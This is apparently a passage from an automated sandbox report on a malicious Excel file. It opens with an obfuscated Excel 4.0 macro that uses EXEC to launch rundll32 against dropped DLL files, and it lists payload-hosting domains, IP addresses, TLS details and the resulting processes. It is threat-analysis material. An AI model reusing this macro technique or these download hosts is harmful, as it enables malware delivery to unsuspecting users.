                  "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  May 12, 2021 12:37:06.495285988 CEST49165443192.168.2.22192.185.39.58
                  May 12, 2021 12:37:06.654580116 CEST44349165192.185.39.58192.168.2.22
                  May 12, 2021 12:37:06.654671907 CEST49165443192.168.2.22192.185.39.58
                  May 12, 2021 12:37:06.667176962 CEST49165443192.168.2.22192.185.39.58
                  May 12, 2021 12:37:06.827488899 CEST44349165192.185.39.58192.168.2.22
                  May 12, 2021 12:37:06.840073109 CEST44349165192.185.39.58192.168.2.22
                  May 12, 2021 12:37:06.840120077 CEST44349165192.185.39.58192.168.2.22
                  May 12, 2021 12:37:06.840143919 CEST44349165192.185.39.58192.168.2.22
                  May 12, 2021 12:37:06.840286970 CEST49165443192.168.2.22192.185.39.58
                  May 12, 2021 12:37:06.891573906 CEST49165443192.168.2.22192.185.39.58
                  May 12, 2021 12:37:07.059170961 CEST44349165192.185.39.58192.168.2.22
                  May 12, 2021 12:37:07.059374094 CEST49165443192.168.2.22192.185.39.58
                  May 12, 2021 12:37:08.692394018 CEST49165443192.168.2.22192.185.39.58
                  May 12, 2021 12:37:08.891563892 CEST44349165192.185.39.58192.168.2.22
                  May 12, 2021 12:37:08.896677971 CEST44349165192.185.39.58192.168.2.22
                  May 12, 2021 12:37:08.896771908 CEST49165443192.168.2.22192.185.39.58
                  May 12, 2021 12:37:08.896882057 CEST44349165192.185.39.58192.168.2.22
                  May 12, 2021 12:37:08.896939993 CEST49165443192.168.2.22192.185.39.58
                  May 12, 2021 12:37:08.897197962 CEST49165443192.168.2.22192.185.39.58
                  May 12, 2021 12:37:09.055740118 CEST44349165192.185.39.58192.168.2.22
                  May 12, 2021 12:37:09.104923964 CEST49168443192.168.2.22192.185.32.232
                  May 12, 2021 12:37:09.266446114 CEST44349168192.185.32.232192.168.2.22
                  May 12, 2021 12:37:09.266625881 CEST49168443192.168.2.22192.185.32.232
                  May 12, 2021 12:37:09.267322063 CEST49168443192.168.2.22192.185.32.232
                  May 12, 2021 12:37:09.428725004 CEST44349168192.185.32.232192.168.2.22
                  May 12, 2021 12:37:09.442513943 CEST44349168192.185.32.232192.168.2.22
                  May 12, 2021 12:37:09.442574024 CEST44349168192.185.32.232192.168.2.22
                  May 12, 2021 12:37:09.442614079 CEST44349168192.185.32.232192.168.2.22
                  May 12, 2021 12:37:09.442691088 CEST49168443192.168.2.22192.185.32.232
                  May 12, 2021 12:37:09.442725897 CEST49168443192.168.2.22192.185.32.232
                  May 12, 2021 12:37:09.495121956 CEST49168443192.168.2.22192.185.32.232
                  May 12, 2021 12:37:09.665904045 CEST44349168192.185.32.232192.168.2.22
                  May 12, 2021 12:37:09.666071892 CEST49168443192.168.2.22192.185.32.232
                  May 12, 2021 12:37:09.708590984 CEST49168443192.168.2.22192.185.32.232
                  May 12, 2021 12:37:09.911442041 CEST44349168192.185.32.232192.168.2.22
                  May 12, 2021 12:37:10.398267031 CEST44349168192.185.32.232192.168.2.22
                  May 12, 2021 12:37:10.398446083 CEST49168443192.168.2.22192.185.32.232
                  May 12, 2021 12:37:10.398619890 CEST44349168192.185.32.232192.168.2.22
                  May 12, 2021 12:37:10.398680925 CEST49168443192.168.2.22192.185.32.232
                  May 12, 2021 12:37:10.398968935 CEST49168443192.168.2.22192.185.32.232
                  May 12, 2021 12:37:10.560430050 CEST44349168192.185.32.232192.168.2.22

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  May 12, 2021 12:37:06.415329933 CEST5219753192.168.2.228.8.8.8
                  May 12, 2021 12:37:06.472831011 CEST53521978.8.8.8192.168.2.22
                  May 12, 2021 12:37:07.408622980 CEST5309953192.168.2.228.8.8.8
                  May 12, 2021 12:37:07.457477093 CEST53530998.8.8.8192.168.2.22
                  May 12, 2021 12:37:07.466032982 CEST5283853192.168.2.228.8.8.8
                  May 12, 2021 12:37:07.515127897 CEST53528388.8.8.8192.168.2.22
                  May 12, 2021 12:37:08.074537039 CEST6120053192.168.2.228.8.8.8
                  May 12, 2021 12:37:08.123574018 CEST53612008.8.8.8192.168.2.22
                  May 12, 2021 12:37:08.130614042 CEST4954853192.168.2.228.8.8.8
                  May 12, 2021 12:37:08.182197094 CEST53495488.8.8.8192.168.2.22
                  May 12, 2021 12:37:08.917040110 CEST5562753192.168.2.228.8.8.8
                  May 12, 2021 12:37:09.102442026 CEST53556278.8.8.8192.168.2.22

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  May 12, 2021 12:37:06.415329933 CEST192.168.2.228.8.8.80x26d4Standard query (0)signifysystem.comA (IP address)IN (0x0001)
                  May 12, 2021 12:37:08.917040110 CEST192.168.2.228.8.8.80xcec1Standard query (0)fcventasyservicios.clA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  May 12, 2021 12:37:06.472831011 CEST8.8.8.8192.168.2.220x26d4No error (0)signifysystem.com192.185.39.58A (IP address)IN (0x0001)
                  May 12, 2021 12:37:09.102442026 CEST8.8.8.8192.168.2.220xcec1No error (0)fcventasyservicios.cl192.185.32.232A (IP address)IN (0x0001)

                  HTTPS Packets

                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                  May 12, 2021 12:37:06.840143919 CEST192.185.39.58443192.168.2.2249165CN=cpcontacts.signifysystem.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 01 17:00:25 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 30 17:00:25 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                  May 12, 2021 12:37:09.442614079 CEST192.185.32.232443192.168.2.2249168CN=mail.fcventasyservicios.cl CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 13:01:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 14:01:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                  Code Manipulations

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:12:36:38
                  Start date:12/05/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13f8c0000
                  File size:27641504 bytes
                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:12:36:45
                  Start date:12/05/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                  Imagebase:0xffa10000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:12:36:46
                  Start date:12/05/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                  Imagebase:0xffa10000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Code Analysis

                  Reset < >